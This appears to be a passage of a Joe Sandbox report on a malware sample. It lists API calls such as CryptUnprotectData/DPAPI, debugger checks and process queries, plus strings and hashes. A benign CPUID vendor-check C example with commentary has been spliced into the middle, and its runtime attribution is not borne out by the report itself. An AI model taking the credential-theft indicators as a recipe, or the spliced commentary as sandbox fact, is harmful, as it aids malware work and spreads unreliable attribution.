                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                          • String ID: DPAPI
                                                                                                                                                                                                                                                          • API String ID: 2068576380-1690256801
                                                                                                                                                                                                                                                          • Opcode ID: 3971597dd6902e61427a960acd39a2e1f93afc510a432da766ca24f4d340c305
                                                                                                                                                                                                                                                          • Instruction ID: 01ba69df9bf7ffd75cea9747ffdf0f525605cfad4e63cd4adfd09bc189e09f00
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3971597dd6902e61427a960acd39a2e1f93afc510a432da766ca24f4d340c305
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A801FF75A01218AFCB10DFA8D88899EBBF9FF48754B204065EA05E7344D7709E41CB90
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,771A83C0,00000000,?,?,?,?,?,?,00FFC011,?,00FF7104,?), ref: 00FFBA9B
                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00FFC011,?,00FF7104), ref: 00FFBACB
                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,00FFC011,?,00FF7104,?), ref: 00FFBAF7
                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00FFC011,?,00FF7104,?), ref: 00FFBB05
                                                                                                                                                                                                                                                            • Part of subcall function 00FFB413: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 00FFB447
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3986731826-0
                                                                                                                                                                                                                                                          • Opcode ID: 01c6605a02e174fafbcbf8f26dbc5474438c35dd126e3a9a41fed5ff3918d791
                                                                                                                                                                                                                                                          • Instruction ID: e850e3b99715cc51abc97470be9b00da03fee2bcf97378970aa032dc2d348f62
• Opcode Fuzzy Hash: 01c6605a02e174fafbcbf8f26dbc5474438c35dd126e3a9a41fed5ff3918d791
• Instruction Fuzzy Hash: FB419271800209DFCF21DF69C880AAEBBF8FF49310F14016AE955EB26AE3359945DF60
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CD61209
• IsDebuggerPresent.KERNEL32 ref: 6CD612D5
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CD612EE
• UnhandledExceptionFilter.KERNEL32(?), ref: 6CD612F8
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: 5e8286fee28d93bbd763d754617b24f5d602a495219b929886619e5ca6740fcd
• Instruction ID: ba6b7cfeade0003c845500a2b3edccacea89ffd84d6ec8716efb612e98f2107c
• Opcode Fuzzy Hash: 5e8286fee28d93bbd763d754617b24f5d602a495219b929886619e5ca6740fcd
• Instruction Fuzzy Hash: 993126B5D01229DBDF21DFA5C9897CDBBF8AF08304F1041AAE50DAB650EB709A84CF54
APIs
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,00FE5504,?,?,?,?), ref: 00FF20A0
• GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00FF20AD
• HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00FF20B4
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: Heap$AllocBinaryCryptProcessString
• String ID:
• API String ID: 1871034439-0
• Opcode ID: 0e095bd95d15947043a1533677689bc1a9989160a28e9860d5bd0495e4d78de7
• Instruction ID: 0d82dd2ada663677a51fc604ea6ece1de4df9b425ab19705403ee0c6fded9d8d
• Opcode Fuzzy Hash: 0e095bd95d15947043a1533677689bc1a9989160a28e9860d5bd0495e4d78de7
• Instruction Fuzzy Hash: 65011272500209BFDF118F65DC48DBE7BBEFF89360B148458F64593114DB319990EB60
APIs
• CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86AE
• LocalAlloc.KERNEL32(00000040,?,?,?,00FE6716,?), ref: 00FE86BC
• CryptStringToBinaryA.CRYPT32(00FE6716,00000000,00000001,00000000,?,00000000,00000000), ref: 00FE86D2
• LocalFree.KERNEL32(?,?,?,00FE6716,?), ref: 00FE86E1
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4291131564-0
                                                                                                                                                                                                                                                          • Opcode ID: 5a6df078b6e508e40ccb15aaa28b7923b323899fb838df3f711ff1af4e82a9c8
                                                                                                                                                                                                                                                          • Instruction ID: 869889c2d88d74f918b98875af26187d23a89221afd45dcf11aa4b6692fb2963
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6df078b6e508e40ccb15aaa28b7923b323899fb838df3f711ff1af4e82a9c8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63F0E7B4502235BFCB315F56DC4DE8B7EB9EF46BA0B104055FA09A6248D7714A40DBE1
Strings
• __ZN, xrefs: 6CD59017
• ?, xrefs: 6CD5950D
• .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs, xrefs: 6CD58BF5
• `fmt::Error`s should be impossible without a `fmt::Formatter`, xrefs: 6CD59798
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: .llvm./rust/deps\rustc-demangle-0.1.24\src/lib.rs$?$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
• API String ID: 0-2050174402
APIs
• NtWriteFile.NTDLL ref: 6CD50E3F
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6CD50E4F
• RtlNtStatusToDosError.NTDLL ref: 6CD50E6F
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ErrorFileObjectSingleStatusWaitWrite
• String ID:
• API String ID: 3447438843-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6CD66BC4
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6CD66BCE
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6CD66BDB
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• BCryptGenRandom.BCRYPT(00000000,?,?,00000002,00000000,?,00000007,?,6CD2AE46,?,?,?,?,6CD6E0E7,?,?), ref: 6CD2B058
• SystemFunction036.ADVAPI32(?,?,?,6CD2AE46,?,?,?,?,6CD6E0E7,?,?,00000020), ref: 6CD2B069
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: CryptFunction036RandomSystem
• String ID:
• API String ID: 1232939966-0
APIs
• GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00FE145D
• NtQueryInformationProcess.NTDLL(00000000), ref: 00FE1464
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentInformationQuery
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3953534283-0
                                                                                                                                                                                                                                                          • Opcode ID: f94b105bf49f23b237c4728aba8f259275543b90a5e703de664511a851e0b5ff
                                                                                                                                                                                                                                                          • Instruction ID: 30b299e81441166c6603fbeb31f3ee398800fb5d5f3081c6d6f7b586df676729
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f94b105bf49f23b237c4728aba8f259275543b90a5e703de664511a851e0b5ff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BE01271A41304FBFB20DBA2DC0AB5A72ACA700759F108154B352E20C0D6B8EA04A765
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: xn--
                                                                                                                                                                                                                                                          • API String ID: 0-2826155999
                                                                                                                                                                                                                                                          • Opcode ID: 53b2c889316cfb0762e67f361bbaa63c1169896d2a80ad70f007d046bc69508f
                                                                                                                                                                                                                                                          • Instruction ID: 0572f8387f4588f3ae3956b012497caaf5389e25a1f2844c55e24ef12a2e4453
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53b2c889316cfb0762e67f361bbaa63c1169896d2a80ad70f007d046bc69508f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28A246B1E052748AEF04CF94C8A07EDB7B1BF47308F18526AD49E7BAA1D3354985CB61
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3732870572-0
                                                                                                                                                                                                                                                          • Opcode ID: fe4136daf117cff46768517c689f90f7af7920e408ce8bdf3096aa9c4c2bf2e9
                                                                                                                                                                                                                                                          • Instruction ID: 8add5ad62ee8461369204c59f79e30dea443a1214105a6d97a3c350ced1e707c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe4136daf117cff46768517c689f90f7af7920e408ce8bdf3096aa9c4c2bf2e9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70E1B1716083618FC725CF28C8907ABB7E2EFC6304F45592EE5D99B7A1DB319845CB82
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3732870572-0
                                                                                                                                                                                                                                                          • Opcode ID: 10e617ae4d5cbc77c6b7dabd0ce70fa163320d21a6e2eaed9e393f95c3d77419
                                                                                                                                                                                                                                                          • Instruction ID: 31c7e885698634ce8e396a115c8aba90333b4ef4bcf24093b28d40848494e9fc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10e617ae4d5cbc77c6b7dabd0ce70fa163320d21a6e2eaed9e393f95c3d77419
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06E1C271A083159FC724CF18CC916AAB7E6EFC6314F155A2FE89DD7660DB30A845CB82
                                                                                                                                                                                                                                                          APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CD6D730,?,?,00000008,?,?,6CD6D333,00000000), ref: 6CD6D962
• Note: exception code 0xC000000D is STATUS_INVALID_PARAMETER, raised here with no flags and one argument.
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: feb54161888999bcb99538d6c180b29c1924a711f8f1d72458296d7c0413c582
• Instruction ID: e88ae035013c5a4987859cc662f6ed463265692ab8a78b55ead4bb428f14adeb
• Opcode Fuzzy Hash: feb54161888999bcb99538d6c180b29c1924a711f8f1d72458296d7c0413c582
• Instruction Fuzzy Hash: F5B12731610608DFD705CF29D486B55BBA0FF45368F358699E8EACFAA1C335E982CB40
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CD613EC
• Note: feature 0xA is PF_XMMI64_INSTRUCTIONS_AVAILABLE (SSE2 support); this is a routine runtime start-up probe, not a sandbox or VM check.
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
• Opcode ID: a70fa59f28df80cf1eed83471fdcd7d361c6df448da2beb96d670386bec9f903
• Instruction ID: e111222ad04848dd70f5a67be7ae889788548c40c0411db27719849de0f1ae5f
• Opcode Fuzzy Hash: a70fa59f28df80cf1eed83471fdcd7d361c6df448da2beb96d670386bec9f903
• Instruction Fuzzy Hash: B5A19DB6A01205EFEB08CF66C88179EBBB9FB49324F25812AD515E7BD0D7349540CF64
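Added example, not code from the Joe Sandbox report or from the sample. The IsProcessorFeaturePresent(0xA) probe in the function above and the contiguous literal "AuthenticAMDHygonGenuineGenuineIntel" referenced by the function that follows (xref 6CD6F76E) are both what the MSVC runtime's start-up cpuid vendor check leaves in a binary: three 12-byte CPUID leaf-0 vendor IDs emitted back to back with no NUL between them, which is why the sandbox extracts them as one 36-character string. Recognising that artifact matters when triaging a "queries CPU information (cpuid)" signature, because the vendor check itself is runtime code rather than sandbox evasion. The C below rebuilds the vendor string from CPUID leaf-0 registers, matches it against the same three-entry table, and on x86 GCC/Clang queries the live CPU; the `VENDOR_TABLE` name, the `__get_cpuid` call and the register values used in comments are this example's own choices.

```c
/* Added example: the CPUID vendor check behind the 36-byte literal
 * "AuthenticAMDHygonGenuineGenuineIntel" seen in the 6CD10000 module.
 * Not from the sample or the Joe Sandbox report. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#if defined(__GNUC__) && (defined(__x86_64__) || defined(__i386__))
#include <cpuid.h>
#define HAVE_CPUID 1
#else
#define HAVE_CPUID 0
#endif

/* Three 12-byte vendor IDs stored back to back without NUL separators.
 * The compiler lays this out as exactly the string the sandbox extracted. */
static const char VENDOR_TABLE[] = "AuthenticAMD" "HygonGenuine" "GenuineIntel";

enum cpu_vendor { VENDOR_UNKNOWN = 0, VENDOR_AMD = 1, VENDOR_HYGON = 2, VENDOR_INTEL = 3 };

/* CPUID leaf 0 returns the vendor ID as EBX, EDX, ECX (in that order), with
 * each register holding four ASCII bytes, lowest byte first. Bytes are
 * extracted explicitly so this works regardless of host endianness. */
void vendor_from_regs(uint32_t ebx, uint32_t edx, uint32_t ecx, char out[13]) {
    const uint32_t regs[3] = { ebx, edx, ecx };
    for (int r = 0; r < 3; r++) {
        for (int b = 0; b < 4; b++) {
            out[r * 4 + b] = (char)((regs[r] >> (8 * b)) & 0xFFu);
        }
    }
    out[12] = '\0';
}

/* Compare the 12-byte vendor ID against each entry of the packed table,
 * the same way a runtime start-up check does (no NUL in the table, so the
 * comparison is a fixed-length memcmp, not a strcmp). */
enum cpu_vendor classify_vendor(const char *vendor12) {
    for (int i = 0; i < 3; i++) {
        if (memcmp(vendor12, VENDOR_TABLE + 12 * i, 12) == 0) {
            return (enum cpu_vendor)(i + 1);
        }
    }
    return VENDOR_UNKNOWN;
}

/* Query the running CPU where cpuid is available (x86 GCC/Clang);
 * elsewhere report that the check could not be performed. */
enum cpu_vendor live_vendor(char out[13]) {
#if HAVE_CPUID
    unsigned eax, ebx, ecx, edx;
    if (__get_cpuid(0, &eax, &ebx, &ecx, &edx)) {
        vendor_from_regs(ebx, edx, ecx, out);
        return classify_vendor(out);
    }
#endif
    strcpy(out, "unavailable");
    return VENDOR_UNKNOWN;
}

int main(void) {
    char v[13];
    enum cpu_vendor c = live_vendor(v);
    /* Example register values for "GenuineIntel" (constructed):
     * EBX=0x756E6547 "Genu", EDX=0x49656E69 "ineI", ECX=0x6C65746E "ntel" */
    printf("vendor=%s class=%d table_bytes=%zu\n", v, (int)c, sizeof(VENDOR_TABLE) - 1);
    return 0;
}
```

The packed table is the point: a memory dump or strings pass shows one 36-byte run, not three separate vendor names, so when this exact literal turns up in a function near `__aulldiv`, `RaiseException` and `IsProcessorFeaturePresent` wrappers it is the compiler runtime talking, and the analyst's attention belongs on any cpuid use elsewhere in the sample that reads the hypervisor bit or the 0x40000000 leaf instead.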
Strings
• AuthenticAMDHygonGenuineGenuineIntel, xrefs: 6CD6F76E
• Note: this 36-byte run is a packed table of three CPUID leaf-0 vendor IDs ("AuthenticAMD", "HygonGenuine", "GenuineIntel") as emitted by the MSVC runtime's start-up cpuid vendor check; it is compiler runtime code and normally not logic specific to this sample.
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: AuthenticAMDHygonGenuineGenuineIntel
• API String ID: 0-1939122913
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Strings
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID: UNC\
• API String ID: 0-505053535
APIs
• EnumSystemLocalesA.KERNEL32(Function_0002AC61,00000001), ref: 0100B00F
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: EnumLocalesSystem
• String ID:
• API String ID: 2099609381-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0002708C), ref: 010070D3
Memory Dump Source
• Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 2a6ee74febe6b2899abe14cd342bad32124384e88427a7c84745717ab340c43f
• Instruction ID: dafafe1b918ad62f2434c503a8fe109ca5abe47ba075fc952cfbdeb8df1bc967
• Opcode Fuzzy Hash: 2a6ee74febe6b2899abe14cd342bad32124384e88427a7c84745717ab340c43f
• Instruction Fuzzy Hash: 199002B4291101C7A76257B19C5944635A05A49522F810595F0C1C9048DE5A50406672
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 65e2e965be29e1b06b8377e557d5b7f45b8ca958c6d5b30c8a6c943f7630a3f0
• Instruction ID: 5406594ba8a8eb7fa569aedfcef38121c4760f47b7df672be746c0be6f24f132
• Opcode Fuzzy Hash: 65e2e965be29e1b06b8377e557d5b7f45b8ca958c6d5b30c8a6c943f7630a3f0
• Instruction Fuzzy Hash: DC8201B5904F448FD365CF29D880B92B7F1BF4A314F108A2ED9EA87B61DB31A545CB90
Memory Dump Source
• Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
• Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmp
